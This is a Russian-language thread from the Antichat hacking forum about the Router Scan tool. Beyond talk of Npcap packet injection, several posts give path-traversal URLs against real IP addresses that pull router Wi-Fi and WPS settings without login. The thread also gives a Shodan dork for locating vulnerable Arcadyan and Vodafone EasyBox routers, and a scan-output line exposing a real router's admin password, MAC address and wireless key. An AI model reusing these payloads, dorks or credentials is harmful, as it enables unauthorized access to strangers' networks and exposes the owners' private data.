HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4411  
Старый 18.10.2017, 13:07
exzet
Active Member
Регистрация: 26.05.2017
Сообщений: 67
Провел на форуме:
18821

Репутация: 0
По умолчанию

Цитата:
Сообщение от binarymaster  

Почитайте, и дайте знать, можно ли там инжектить пакеты.

Если правильно понял описание с гитхаба, то можно

Цитата:

Loopback Packet Injection: Npcap is also able to send loopback packets using the Winsock Kernel (WSK) technique. User-level software such as Nping can just send the packets out using Npcap Loopback Adapter just like any other adapter. Npcap then does the magic of removing the packet's Ethernet header and injecting the payload into the Windows TCP/IP stack.

 
Ответить с цитированием

  #4412  
Старый 18.10.2017, 13:09
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от binarymaster  

Я так и не понял, что там было.

UPD: дошло. Файл конфигурации был недоступен. Починил одним доп. запросом.

Цитата:
Сообщение от exzet  

Если правильно понял описание с гитхаба, то можно

Это про псевдо-интерфейс замыкания на себя. А вот с режимом 802.11 монитора всё сложнее.
 
Ответить с цитированием

  #4413  
Старый 18.10.2017, 14:03
exzet
Active Member
Регистрация: 26.05.2017
Сообщений: 67
Провел на форуме:
18821

Репутация: 0
По умолчанию

Цитата:
Сообщение от binarymaster  

Это про псевдо-интерфейс замыкания на себя. А вот с режимом 802.11 монитора всё сложнее.

Извиняюсь, не совсем понял про инжект пакетов. Если имелось ввиду отправка сырых пакетов обходя виндовый драйвер, то libpcap давно это позволяет. А если имелось ввиду инжектить пакеты в режиме монитора, то не знаю, возможно ли такое в принципе? Если только через режим менеджера попробовать, в общем надо доки курить.
 
Ответить с цитированием

  #4414  
Старый 18.10.2017, 16:37
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от binarymaster  

А вот тут нашёл уязвимость!

Можно получить настройки XML без авторизации:

http://79.108.31.148:8080/xml/../xml/CmgwWirelessSecurity.xml

http://79.108.31.148:8080/xml/../xml/CmgwWirelessWPS.xml

и т.д.

Продолжая копаться в сетях Испании, решил откопать Arcadyan Livebox, для которого недавно был добавлен алгоритм генерации пина.

Для нахождения этих роутеров пришлось пройти небольшой квест, так как они маскируются под Apache - путём проб и ошибок правильный дорк был выявлен:

https://www.shodan.io/search?query=200+OK+Apache+no-cache+max-age=0,+must-revalidate+close+text/html+length+bytes+-Modified+-Expires

Дальше - интереснее. Эти железяки имеют ту же уязвимость, хотя производитель прошивки совсем другой!

http://85.54.48.2:8081/images/../status_main.stm



Осталось лишь вытащить данные авторизации из config_dsl.bin, но этим я пока решил не заниматься, ибо настройки и так хорошо добываются.

Информация по расшифровке имеется здесь:

https://wiki.openwrt.org/toh/arcadyan/arv7506
 
Ответить с цитированием

  #4415  
Старый 18.10.2017, 19:42
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от binarymaster  

Продолжая копаться в сетях Испании, решил откопать Arcadyan Livebox

Хе хе, оказывается немецкие Vodafone EasyBox на этой же прошивке, я догадывался!

Да, они делят между собой одинаковые уязвимости веб интерфейса и пин кода.
 
Ответить с цитированием

  #4416  
Старый 19.10.2017, 11:36
Ossen
Active Member
Регистрация: 04.06.2015
Сообщений: 229
Провел на форуме:
56839

Репутация: 0
По умолчанию

Людии ну будьте вы людьми ну ставьте вы свои роутеры на подоконник к примеру, ну не прячьте вы их под диванами или шкафами а то получается ни себе и ни людям
 
Ответить с цитированием

  #4417  
Старый 19.10.2017, 11:58
AleksRull
Member
Регистрация: 30.12.2016
Сообщений: 49
Провел на форуме:
19080

Репутация: 0
По умолчанию

Не пойму 31.132.171.88 парсится admin:vertex25, но при входе в админку под user:user все равно пускает к настройкам. Что то не чисто с этими dasan H660RW
 
Ответить с цитированием

  #4418  
Старый 19.10.2017, 13:39
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от AleksRull  

Не пойму 31.132.171.88 парсится admin:vertex25, но при входе в админку под user:user все равно пускает к настройкам. Что то не чисто с этими dasan H660RW

Я это уже поправил вчера.

Код:
31.132.171.88    80    31    Done    admin:vertex25    Boa ADSL (xPON ONU | H660RW)            18:D0:71:77:34:47    59    WPA/WPA2    0000004377        192.168.55.1    255.255.255.0    31.132.171.88    255.255.255.224    31.132.171.65    77.232.128.1 77.232.135.1
 
Ответить с цитированием

  #4419  
Старый 19.10.2017, 14:07
sergnsk22
Member
Регистрация: 17.10.2017
Сообщений: 2
Провел на форуме:
575

Репутация: 0
По умолчанию

В веб-поиске возможно ли реализовать поиск по ип диапазону?

И возможно ли реализовать отображение на карте найденых элементов(через поиск)?
 
Ответить с цитированием

  #4420  
Старый 19.10.2017, 14:17
binarymaster
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379

Репутация: 125


По умолчанию

Цитата:
Сообщение от sergnsk22  

В веб-поиске возможно ли реализовать поиск по ип диапазону?

И возможно ли реализовать отображение на карте найденых элементов(через поиск)?

Это тема про Router Scan, а не про 3WiFi.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.